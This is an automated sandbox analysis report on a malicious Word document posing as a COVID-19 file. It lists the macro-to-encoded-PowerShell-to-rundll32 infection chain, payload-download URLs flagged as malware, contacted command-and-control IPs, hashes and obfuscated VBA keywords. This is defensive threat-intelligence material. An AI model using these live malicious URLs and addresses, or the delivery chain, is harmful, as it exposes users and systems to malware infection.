Domain Accounts | Scripting 22 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 111 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | PowerShell 4 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 22 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | File Deletion 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

Behavior Graph

Behavior Graph ID: 338719 | Sample: AG60273928I_COVID-19_SARS-C... | Startdate: 12/01/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 11 other signatures

Process tree as drawn in the graph (numbers after a process name are the graph's created-file / registry-value counters):

  • cmd.exe started (signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found)
    • powershell.exe 12 9 started (DNS/IP: mybusinessevent.com 185.2.4.29, 443, 49167, 49168, REGISTER_UK-ASGB, Italy; shulovbaazar.com 51.79.161.36, 443, 49165, 49166, OVHFR, Canada; 2 other IPs or domains; dropped: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll, PE32; signature: Powershell drops PE file)
      • rundll32.exe started
        • rundll32.exe 2 started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
          • rundll32.exe 1 started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
            • rundll32.exe 1 started (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
              • rundll32.exe 9 started (DNS/IP: 71.72.196.159, 80, TWC-10796-MIDWESTUS, United States; 69.49.88.46, 49171, 80, MPW-MACHLINK-NETUS, United States; signature: System process connects to network (likely due to code injection or exploit))
    • msg.exe started
  • WINWORD.EXE 293 23 started


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
AG60273928I_COVID-19_SARS-CoV-2.doc | 27% | Virustotal |
AG60273928I_COVID-19_SARS-CoV-2.doc | 23% | ReversingLabs | Document-Excel.Downloader.Heuristic

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.rundll32.exe.1f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.210000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.1f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.210000.1.unpack | 100% | Avira | HEUR/AGEN.1110387

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://thenetworker.ca/comment/8N4/ | 0% | Avira URL Cloud | safe
https://shulovbaazar.com | 0% | Avira URL Cloud | safe
http://uhk.cncranes.com | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://trayonlinegh.com/cgi-bin/HBPR/ | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://mmo.martinpollock.co.uk/a/SQSGg/ | 0% | Avira URL Cloud | safe
https://mybusinessevent.comp | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://shulovbaazar.comp | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://uhk.cncranes.com/ErrorPages/3/ | 0% | Avira URL Cloud | safe
https://mybusinessevent.com | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/ | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://mybusinessevent.com/tiki-install/e/ | 0% | Avira URL Cloud | safe
https://capturetheaction.com.au/wp-includes/Yjp/ | 100% | Avira URL Cloud | malware
https://shulovbaazar.com/c/bcL6/ | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mybusinessevent.com | 185.2.4.29 | true | true | | unknown
shulovbaazar.com | 51.79.161.36 | true | true | | unknown
uhk.asiash.com | 152.32.168.168 | true | false | | unknown
uhk.cncranes.com | unknown | unknown | true | | unknown

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://uhk.cncranes.com/ErrorPages/3/ | true | Avira URL Cloud: safe | unknown
http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/ | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | false | | high
https://thenetworker.ca/comment/8N4/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com | rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | false | | high
https://shulovbaazar.com | powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://uhk.cncranes.com | powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0 | powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://trayonlinegh.com/cgi-bin/HBPR/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.litespeedtech.com | powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | false | | high
http://mmo.martinpollock.co.uk/a/SQSGg/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | false | | high
https://mybusinessevent.comp | powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp | false | | high
https://shulovbaazar.comp | powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp | false | | high
https://mybusinessevent.com | powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0D | powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2120077438.0000000002820000.00000002.00000001.sdmp | false | URL Reputation: safe | low
https://mybusinessevent.com/tiki-install/e/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://capturetheaction.com.au/wp-includes/Yjp/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://shulovbaazar.com/c/bcL6/ | powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
69.49.88.46 | unknown | United States | 33734 | MPW-MACHLINK-NETUS | true
71.72.196.159 | unknown | United States | 10796 | TWC-10796-MIDWESTUS | true
185.2.4.29 | unknown | Italy | 203461 | REGISTER_UK-ASGB | true
152.32.168.168 | unknown | Hong Kong | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
51.79.161.36 | unknown | Canada | 16276 | OVHFR | true

                              General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 338719
Start date: 12.01.2021
Start time: 19:15:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 35s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: AG60273928I_COVID-19_SARS-CoV-2.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@16/7@3/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 33.2% (good quality ratio 31.6%)
• Quality average: 71.6%
• Quality standard deviation: 24.9%
HCA Information:
• Successful, ratio: 62%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

Time | Type | Description
19:15:40 | API Interceptor | 1x Sleep call for process: msg.exe modified
19:15:41 | API Interceptor | 79x Sleep call for process: powershell.exe modified
19:15:51 | API Interceptor | 794x Sleep call for process: rundll32.exe modified

                              Joe Sandbox View / Context

                              IPs


                                Domains


                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:high, very likely benign file
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AG60273928I_COVID-19_SARS-CoV-2.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 02:15:37 2021, length=162304, window=hide
                                Category:dropped
                                Size (bytes):2238
                                Entropy (8bit):4.5423169393715765
                                Encrypted:false
                                SSDEEP:48:8+HN/XT0jFP/oJaAgQh2+HN/XT0jFP/oJaAgQ/:8k/XojFP/QgQh2k/XojFP/QgQ/
                                MD5:304C2F49F9864FAC78BABAE0D1C6272F
                                SHA1:7D5B556152C92E5A92D3262C2E1A13BECFAA6FD2
                                SHA-256:096B9CA75D85372CDC6CE374749D9F5535321E74FE763432A32ED096B08B20CA
                                SHA-512:5D288F03B6D116A0977357A0E56396E8CD7A85DA0D7DFB8B1E78F7006DF433D2CB1BD7201145ADC8CFF63C5C53325EE3BCAAD8016CD533C85E45A07943D661A0
                                Malicious:false
                                Reputation:low
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):131
                                Entropy (8bit):4.815604707536106
                                Encrypted:false
                                SSDEEP:3:M1rpGcooOpU8gXGcooOpUmX1rpGcooOpUv:MLHspuHsppHsp2
                                MD5:E74E90FCAF7772B822493589DB47C6F9
                                SHA1:FA060EFFEED1184405B4C5B2247CD98FF8578817
                                SHA-256:ADA0C5277F4289117A547E6D892A2389D43D1E925CC573D8EA0D3E956F70B3F4
                                SHA-512:C4898407B2113F63B1DE878B7F85C47C83B1B7599974C55C5DD48E4368D495BEAECD4B1A056C9C60D9FF6A071CE0D9C9BF711D1076302B1DBC6C9FC37393D0B4
                                Malicious:false
                                Reputation:low
                                Preview: [doc]..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..[doc]..AG60273928I_COVID-19_SARS-CoV-2.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.431160061181642
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                Malicious:false
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J81QN4I88FVGHDT92CK8.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5847397118390782
                                Encrypted:false
                                SSDEEP:96:chQCsMqmqvsqvJCwoqz8hQCsMqmqvsEHyqvJCworAzvlYjHRf8OYlUV0Iu:cy7oqz8yvHnorAzvqf8OQIu
                                MD5:DD53FABC928ECE0AAF9143B6978F5DEC
                                SHA1:A1E01E968D252BC3A12894A4AFCDFAD83AD74F41
                                SHA-256:14E0AB9FF66C04E87804FD82DBF585F667A3453DE5A6B902934562D3BCE84EBD
                                SHA-512:C2E2C89B199898B7CA58BD320AAA14197DBF539693EE17C89A3E0E4681F0EA6C0AE827239033974FC0F8E78B5575A30430C1A4A22B09438B04EA3CC517C97963
                                Malicious:false
                                C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.431160061181642
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                Malicious:false
                                C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):340824
                                Entropy (8bit):4.347498688978882
                                Encrypted:false
                                SSDEEP:3072:eG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:eG+Fe17mHoU/3NywH8
                                MD5:D9ED9211C02695D3F3B88F55471BA6E2
                                SHA1:BFF2DCB56FCFEB3CABE48896CE093606915FD0C2
                                SHA-256:A2DA516FB54B231DF55F50BB6C1735CC43D6D634E5EF5925557D18A0AA15DA2F
                                SHA-512:578902C99938395CF7C76C5ABB5F85D515494B0CB4E1CE794A2F56A28BA854F60D096F2C54C9954CD192B751311FA0A2D45442ABD644D044BEC7435D8E1D36DB
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%

                                Static File Info

                                General

                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate, Author: La Breton, Template: Normal.dotm, Last Saved By: Nicolas Menard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 14:56:00 2021, Last Saved Time/Date: Tue Jan 12 14:57:00 2021, Number of Pages: 1, Number of Words: 2554, Number of Characters: 14559, Security: 8
                                Entropy (8bit):6.6917397440496424
                                TrID:
                                • Microsoft Word document (32009/1) 79.99%
                                • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                File name:AG60273928I_COVID-19_SARS-CoV-2.doc
                                File size:161373
                                MD5:6d718814f5cf1ccd99905fdac40a504a
                                SHA1:f1746098ad2bb75e3054351b190cc818712ae46a
                                SHA256:6bb1fa2cba1d52674b980804939a39bb7dc3a68a364402d393e6a3ae520cdce9
                                SHA512:8211b228f5194e9dcbd68be1438631b07bd4534ddaa7b646a20e2f551acd883a1a190b4db46c0589f35d9f1dc9257c7d03829972ab401ce069358828dbe57e7d
                                SSDEEP:3072:u9ufstRUUKSns8T00JSHUgteMJ8qMD7gmd:u9ufsfgIf0pLmd

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "AG60273928I_COVID-19_SARS-CoV-2.doc"

                                Indicators

                                Has Summary Info:True
                                Application Name:Microsoft Office Word
                                Encrypted Document:False
                                Contains Word Document Stream:True
                                Contains Workbook/Book Stream:False
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Code Page:1252
                                Title:
                                Subject:Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate
                                Author:La Breton
                                Keywords:
                                Comments:
                                Template:Normal.dotm
                                Last Saved By:Nicolas Menard
                                Revision Number:1
                                Total Edit Time:0
                                Create Time:2021-01-12 14:56:00
                                Last Saved Time:2021-01-12 14:57:00
                                Number of Pages:1
                                Number of Words:2554
                                Number of Characters:14559
                                Creating Application:Microsoft Office Word
                                Security:8

                                Document Summary

                                Document Code Page:-535
                                Number of Lines:121
                                Number of Paragraphs:34
                                Thumbnail Scaling Desired:False
                                Company:
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:917504

                                Streams with VBA

                                VBA File Name: L95wkirc_zm, Stream Size: 697
                                General
                                Stream Path:Macros/VBA/L95wkirc_zm
                                VBA File Name:L95wkirc_zm
                                Stream Size:697

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                VBA File Name: Ut2r21ym17z8, Stream Size: 1108
                                General
                                Stream Path:Macros/VBA/Ut2r21ym17z8
                                VBA File Name:Ut2r21ym17z8
                                Stream Size:1108

                                VBA Code Keywords

                                Keyword
                                False
                                Private
                                VB_Exposed
                                Attribute
                                VB_Creatable
                                VB_Name
                                Document_open()
                                VB_PredeclaredId
                                VB_GlobalNameSpace
                                VB_Base
                                VB_Customizable
                                VB_TemplateDerived
                                VBA Code
                                VBA File Name: Wnoyuuu28ekk6591v, Stream Size: 10959
                                General
                                Stream Path:Macros/VBA/Wnoyuuu28ekk6591v
                                VBA File Name:Wnoyuuu28ekk6591v
                                Stream Size:10959

                                VBA Code Keywords

                                Keyword
                                QiUwq
                                KKUcJE
                                IRzIEJEhH
                                wKzNWHJF:
                                "w]xm[vw]xm[v"
                                euCMS
                                pOJMnADCJ
                                JYGXBIlF
                                bdthsD
                                Fix(BXAuAz)
                                "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                                iMCSwT:
                                (Fix(BXAuAz)
                                Fix(haldI)
                                NgFCwDc
                                MzYdG
                                Fix(KVceECFW)
                                Fix(HqDzXCHAl)
                                aENWC
                                HqDzXCHAl:
                                Deywj
                                HlSCAZ
                                NHXknCOIO
                                HCvew
                                (Fix(NRQDYIEuB)
                                pBfoEG
                                KVceECFW
                                gGWPAaQE
                                ZPIhEMFUB
                                PQQqeFIV
                                WLUaHmEM
                                HqDzXCHAl
                                AmBRDm
                                syZqCACD:
                                GbHdGd
                                wBPVCHmC
                                vZKQBuM
                                EhgwMQ
                                IFSjFIkG
                                ZDZjIB
                                oXEtI:
                                Fix(PQQqeFIV)
                                Fix(dFxICEjw)
                                RMuSICrX
                                Fix(vZKQBuM)
                                Fix(euCMS)
                                oXEtI
                                bmEDqv
                                SyFFGiI
                                ZWQKFHwJE
                                Fix(hqoyYzBsF)
                                eIaaFZ
                                (Fix(AmBRDm)
                                sjOmJFFlU
                                Fix(ZtkoHFBJE)
                                kJLlUyR:
                                dFxICEjw
                                iMCSwT
                                bmUbGyE
                                DFUrCC
                                BcbiEV:
                                XulhC
                                IdwoCFMGd
                                Fix(GXOzFr)
                                Fix(VjnuHqF)
                                Fix(qomwTEIy)
                                LVentAcm
                                CsYsXv
                                mtEnt
                                GyqdfE
                                zmkyT
                                haldI:
                                VjnuHqF
                                tjEOD:
                                nqWzNZ
                                (Fix(wBPVCHmC)
                                BXAuAz
                                (Fix(euCMS)
                                Fix(BcbiEV)
                                Resume
                                tjEOD
                                Fix(DFJhGAS)
                                Fix(gGWPAaQE)
                                "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                                Fix(OBHkWHOT)
                                ElseIf
                                lQgtJ
                                LLIuCIBBB
                                (Fix(iBHSjSEa)
                                ZJaTECrE
                                wqynHT:
                                Fix(iBHSjSEa)
                                Fix(FqraEHXFK)
                                prYcEiJ
                                (Fix(KAAvICJ)
                                kJLlUyR
                                iBHSjSEa
                                OBHkWHOT:
                                UCwnFlrZJ
                                SBHKCG
                                KVceECFW:
                                (Fix(DFJhGAS)
                                (Fix(vZKQBuM)
                                KAAvICJ
                                euEPorCJT
                                (Fix(QvXuJE)
                                RfdoD
                                Fix(tjEOD)
                                KFoRcFUC
                                jEfqBuNJA
                                "w]xm[v",
                                LiKWuj
                                hqoyYzBsF
                                RiwhJ
                                FqraEHXFK
                                Error
                                nDoEDU
                                Fix(wqynHT)
                                VjnuHqF:
                                Attribute
                                RYasHk
                                rxeqDoVb
                                IXWSCCJ
                                (Fix(dFxICEjw)
                                Len(dsfe))),
                                Fix(QiUwq)
                                cFNuGfA
                                Fix(AmBRDm)
                                haldI
                                (Fix(QiUwq)
                                GXOzFr
                                dLkMB
                                DFJhGAS
                                Fix(QvXuJE)
                                Fix(kJLlUyR)
                                Fix(wKzNWHJF)
                                VB_Name
                                (Fix(hqoyYzBsF)
                                gpMvF
                                QhiuG
                                gdhXNEq
                                ZtkoHFBJE:
                                Fix(NRQDYIEuB)
                                Function
                                qspTA
                                ZtkoHFBJE
                                BcbiEV
                                LFWNyIzJD
                                VDgoIuF
                                qsfzvZAB
                                NRQDYIEuB
                                ammiJ
                                Fix(KAAvICJ)
                                (Fix(qomwTEIy)
                                qomwTEIy
                                Fix(oXEtI)
                                Double
                                Fix(iMCSwT)
                                QvXuJE
                                wqynHT
                                kamgFA
                                (Fix(FqraEHXFK)
                                wKzNWHJF
                                Fix(syZqCACD)
                                gGWPAaQE:
                                "w]xm[vpw]xm[v"
                                GXOzFr:
                                Mid(Application.Name,
                                OBHkWHOT
                                (Fix(PQQqeFIV)
                                UTgTA
                                Fix(wBPVCHmC)
                                syZqCACD
                                jSHOJAlCH
                                VBA Code

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:146
